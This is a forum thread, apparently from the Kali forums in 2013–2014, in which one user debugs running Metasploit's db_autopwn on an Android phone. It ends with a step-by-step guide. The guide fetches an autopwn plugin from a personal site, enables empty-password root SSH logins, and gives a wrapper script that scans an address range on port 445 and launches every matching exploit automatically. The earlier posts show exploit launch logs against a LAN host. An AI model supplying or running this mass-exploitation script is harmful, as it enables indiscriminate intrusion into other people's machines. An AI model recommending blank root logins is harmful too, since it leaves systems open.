PDA

View Full Version : db_autopwn msfconsole Killed



operat0r
2013-08-20, 00:29
UPDATE: I got a S4 running Gummy 4.4.2 / Kali armhf running fine. Something with the mod or the phone was just too low to handle it .. video coming soon

* ya thats right im running db_autopwn ;P
* I forkbomb and it seems to run and never get killed ;P
* I had this issue with ruby before when a system runs out of ram this does not appear to be the case. I still think it is a RAM issue but nothing in dmsg. I think it is Android OS killing it for some reason. I can install packages and fork bomb without it getting killed
* metasploit v4.7.0-2013081401 [core:4.7 api:1.0]
* Linux localhost 2.6.35.14-cyanogenmod #1 PREEMPT Mon Nov 26 06:41:27 EST 2012 armv7l GNU/Linux
* armhf
* it dies in different places so it has something to do with max threads or ram etc



(65/112 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.151:445...
(66/112 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.151:445...
(67/112 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.151:445...
/usr/local/sbin/AP: line 10: 12937 Killed /usr/share/metasploit-framework/msfconsole -r ~/msf.rc


maybe something with ulimit ?


root@localhost:/home/android# ulimit -a
core file size (blocks, -c) 0
data seg size (kbytes, -d) unlimited
scheduling priority (-e) 40
file size (blocks, -f) unlimited
pending signals (-i) 2919
max locked memory (kbytes, -l) 65536
max memory size (kbytes, -m) unlimited
open files (-n) 1024
pipe size (512 bytes, -p) 8
POSIX message queues (bytes, -q) 819200
real-time priority (-r) 0
stack size (kbytes, -s) 8192
cpu time (seconds, -t) unlimited
max user processes (-u) 2919
virtual memory (kbytes, -v) unlimited
file locks (-x) unlimited

operat0r
2013-08-21, 05:13
tried within MSF before autopwn to run:



ulimit -s unlimited
ulimit -l unlimited
ulimit -n 50000
ulimit -q unlimited
ulimit -e unlimited
ulimit -i unlimited
ulimit -u unlimited
ulimit -c unlimited

no luck still gets killed randomly

operat0r
2014-01-01, 19:38
So I got a S4 running Kali ArmHF and Autopwn seems to run ok having a little issues with msf meterperter connections

operat0r
2014-03-01, 03:15
Ok so tried new armel and armhf .. wont even mount in linux deploy ... I think the files are different

Kali.old.img is the working image



$ file *
Kali.img: x86 boot sector; partition 1: ID=0x83, active, starthead 0, startsector 2048, 12619776 sectors, code offset 0xb8
Kali.old.img: Linux rev 1.0 ext2 filesystem data (mounted or unclean), UUID=f48e90ef-167c-433b-8aca-ae80ce014c7e (extents) (large files) (huge files)
kali-linux-1.0.6-armhf.img: x86 boot sector; partition 1: ID=0x83, active, starthead 0, startsector 2048, 11505664 sectors, code offset 0xb8



Here is the output of linux deploy .. it can't even downlaod the image ..


[22:32:54] + [ file == partition ]
[22:32:54] + msg done
[22:32:54] + echo done
[22:32:54] + [ file == file ]
[22:32:54] + [ 0 -eq 0 ]
[22:32:54] + [ -f /data/sdext2/Kali.img ]
[22:32:54] + stat -c %s /data/sdext2/Kali.img
[22:32:54] + FILE_SIZE=4293918720
[22:32:54] + dirname /data/sdext2/Kali.img
[22:32:54] + DIR_NAME=/data/sdext2
[22:32:54] + stat -c %s -f /data/sdext2
[22:32:54] + BLOCK_SIZE=4096
[22:32:54] + stat -c %a -f /data/sdext2
[22:32:54] Making new disk image (4095 MB) ... + AVAILABLE_SIZE=1648172
[22:32:54] + let AVAILABLE_SIZE=(4096*1648172)+4293918720
[22:32:54] + let IMG_SIZE=(11044831232-11044831232/10)/1048576
[22:32:54] + [ 9479 -gt 4095 ]
[22:32:54] + IMG_SIZE=4095
[22:32:54] + msg -n Making new disk image (4095 MB) ...
[22:32:54] + echo -n Making new disk image (4095 MB) ...
[22:32:55] + set -e
[22:32:55] + dd if=/dev/zero of=/data/sdext2/Kali.img bs=1048576 seek=4095 count=0
[22:32:55] 0+0 records in
[22:32:55] 0+0 records out
[22:32:55] 0 bytes (0 B) copied, 6.1035e-05 s, 0.0 kB/s
[22:32:55] + exit 0
[22:32:55] done
[22:32:55] + [ 0 -eq 0 ]
[22:32:55] + msg done
[22:32:55] + echo done
[22:32:55] + [ file == file -o file == partition ]
[22:32:55] + cat /proc/filesystems
[22:32:55] + grep ext4
[22:32:55] Making file system (ext4) ... + [ -n ext4 ]
[22:32:55] + fs_support=ext4
[22:32:55] + break
[22:32:55] + [ -z ext4 ]
[22:32:55] + [ auto == auto ]
[22:32:55] + FS_TYPE=ext4
[22:32:55] + msg -n Making file system (ext4) ...
[22:32:55] + echo -n Making file system (ext4) ...
[22:32:55] + set -e
[22:32:55] + losetup
[22:32:55] + grep /data/sdext2/Kali.img
[22:32:55] + true
[22:32:55] + is_loop=
[22:32:55] + cat /proc/mounts
[22:32:55] + grep /data/sdext2/Kali.img
[22:32:55] + true
[22:32:55] + is_raw=
[22:32:55] + [ -z -a -z ]
[22:32:55] + mke2fs -qF -t ext4 -O ^has_journal /data/sdext2/Kali.img
[22:32:55] ext2fs_check_if_mount: Can't check if filesystem is mounted due to missing mtab file while determining whether /data/sdext2/Kali.img is mounted.
[22:33:05] + exit 0
[22:33:05] + [ 0 -eq 0 ]
[22:33:05] + msg done
[22:33:05] + echo done
[22:33:05] + return 0
[22:33:05] + [ 0 -ne 0 ]
[22:33:05] + msg Mounting partitions:
[22:33:05] + echo Mounting partitions:
[22:33:05] + mount_system root
[22:33:05] + [ 1 -eq 0 ]
[22:33:05] + [ 1 -gt 1 ]
[22:33:05] + msg -n / ...
[22:33:05] + echo -n / ...
[22:33:05] + cat /proc/mounts
[22:33:05] + grep /data/local/linux/mnt
[22:33:05] + is_mnt=
[22:33:05] + [ -z ]
[22:33:05] + [ ! -d /data/local/linux/mnt ]
[22:33:05] + [ -d /data/sdext2/Kali.img ]
[22:33:05] + MNT_OPTS=rw,relatime
[22:33:05] + mount -o rw,relatime /data/sdext2/Kali.img /data/local/linux/mnt
[22:33:05] done
[22:33:05] Mounting partitions:
[22:33:05] / ... done
[22:33:05] Installing Debian-based distribution:
[22:33:05] + [ 0 -eq 0 ]
[22:33:05] + msg done
[22:33:05] + echo done
[22:33:05] + return 0
[22:33:05] + [ 0 -ne 0 ]
[22:33:05] + msg Installing Debian-based distribution:
[22:33:05] + echo Installing Debian-based distribution:
[22:33:05] + BASIC_PACKAGES=locales,sudo,man-db
[22:33:05] + [ -z ]
[22:33:05] + DEBOOTSTRAP_DIR=/data/local/linux/deploy/debootstrap
[22:33:05] + export DEBOOTSTRAP_DIR
[22:33:05] + debootstrap --no-check-gpg --arch armhf --foreign --extractor=ar --include=locales,sudo,man-db kali /data/local/linux/mnt http://http.kali.org/kali
[22:33:05] I: Retrieving Release
[22:33:05] E: Failed getting release file http://http.kali.org/kali/dists/kali/Release
[22:33:05] + [ 1 -ne 0 ]
[22:33:05] + return 1
[22:33:05] + msg <<< end: install
[22:33:05] + echo <<< end: install
[22:33:05] <<< end: install
[22:33:05] + exit

operat0r
2014-03-01, 23:10
https://github.com/meefik/linuxdeploy/issues/102#issuecomment-36440054 worked for me moving linux deploy wget to wget.old and after that clicking the install button



Setup:

* T-Mobile T759 (Samsung Galaxy S4)
* Gummy-2.1-12-18-13-NIGHTLY-jfltetmo
* 16gig card formatted first fat32 8.5gig and ext2 7.3gig ( using Link2SD on appstore to mount the ext2 part)

Reference:
https://forums.kali.org/showthread.php?18379-db_autopwn-msfconsole-Killed
https://github.com/meefik/linuxdeploy/issues/102#issuecomment-36440054

Video:
http://rmccurdy.com/scripts/videos/rmccurdy_com/Linux_Deploy_KitKat_Android_Metasploit_Autopwn.mp4


# Looks I did not setup like you can use FAT32 and still have a gig or so free. so I will most likly go back to normal FAT32 single part
/data/sdext2/Kali2.img Kali2.img (4293918720 bytes in 873.174s)

* install linux deploy
* select Kali
* leave the size to auto if you like or set the size and path to above 4gig to what ever Link2SD mounted your other ext2 partition to see below for 4+gig image
* before you click install i had to remove the apps wget and use my native wget
mv /data/local/linux/bin/wget /data/local/linux/bin/wget.old
* installs normaly I enable ssh only.. login android password changeme
* apt-get install metasploit screen -y

* allow blank root login.. vi /etc/ssh/sshd_config ... /etc/init.d/ssh restart
PermitEmptyPasswords yes
PermitRootLogin yes
#UsePAM yes
PasswordAuthentication yes

* stop postgres
/etc/init.d/postgresql stop
* start postgres
su postgres -c "/usr/lib/postgresql/9.1/bin/postgres -D /etc/postgresql/9.1/main/" &

* you may not need the above step .. I had issues before with postgres starting
* create msf user
su postgres -c "createuser msf -P"
* get autopwn script
wget -U notwgetiblockit -O /usr/share/metasploit-framework/plugins/db_autopwn.rb 'http://rmccurdy.com/scripts/db_autopwn.rb'

* Autopwn script for Kali put in /usr/local/sbin/AP
* usage AP 192.168.1.1-255
-------
# set ulimit to 50K not 1024

# stop postgres
/etc/init.d/postgresql stop
sleep 3

# start postgres
su postgres -c "/usr/lib/postgresql/9.1/bin/postgres -D /etc/postgresql/9.1/main/" &
sleep 20


# drop and create DB
su postgres -c "dropdb msf;createdb --owner=msf msf"

ulimit -s unlimited
ulimit -l unlimited
ulimit -n 50000
ulimit -q unlimited
ulimit -e unlimited
ulimit -i unlimited
ulimit -u unlimited
ulimit -c unlimited



# load db_autopwn.rb ,connect , run nmap,autopwn
echo "load db_autopwn" > ~/msf.rc
echo "sleep 5" >> ~/msf.rc
echo "db_connect msf:msf@127.0.0.1/msf" >> ~/msf.rc
echo "sleep 5" >> ~/msf.rc
echo "db_nmap -p 445 $1" >> ~/msf.rc
echo "sleep 5" >> ~/msf.rc

echo bash -c \'ulimit -s unlimited\' >> ~/msf.rc
echo bash -c \'ulimit -l unlimited\' >> ~/msf.rc
echo bash -c \'ulimit -n 50000\' >> ~/msf.rc
echo bash -c \'ulimit -q unlimited\' >> ~/msf.rc
echo bash -c \'ulimit -e unlimited\' >> ~/msf.rc
echo bash -c \'ulimit -i unlimited\' >> ~/msf.rc
echo bash -c \'ulimit -u unlimited\' >> ~/msf.rc
echo bash -c \'ulimit -c unlimited\' >> ~/msf.rc


echo "db_autopwn -p -t -e -v " >> ~/msf.rc



/usr/share/metasploit-framework/msfconsole -r ~/msf.rc
-------






For large 4+gig image
* setup fat32 as first and ext2 as second
* use Link2SD to auto mount both partitions
* my path was /data/sdext2/Kali.img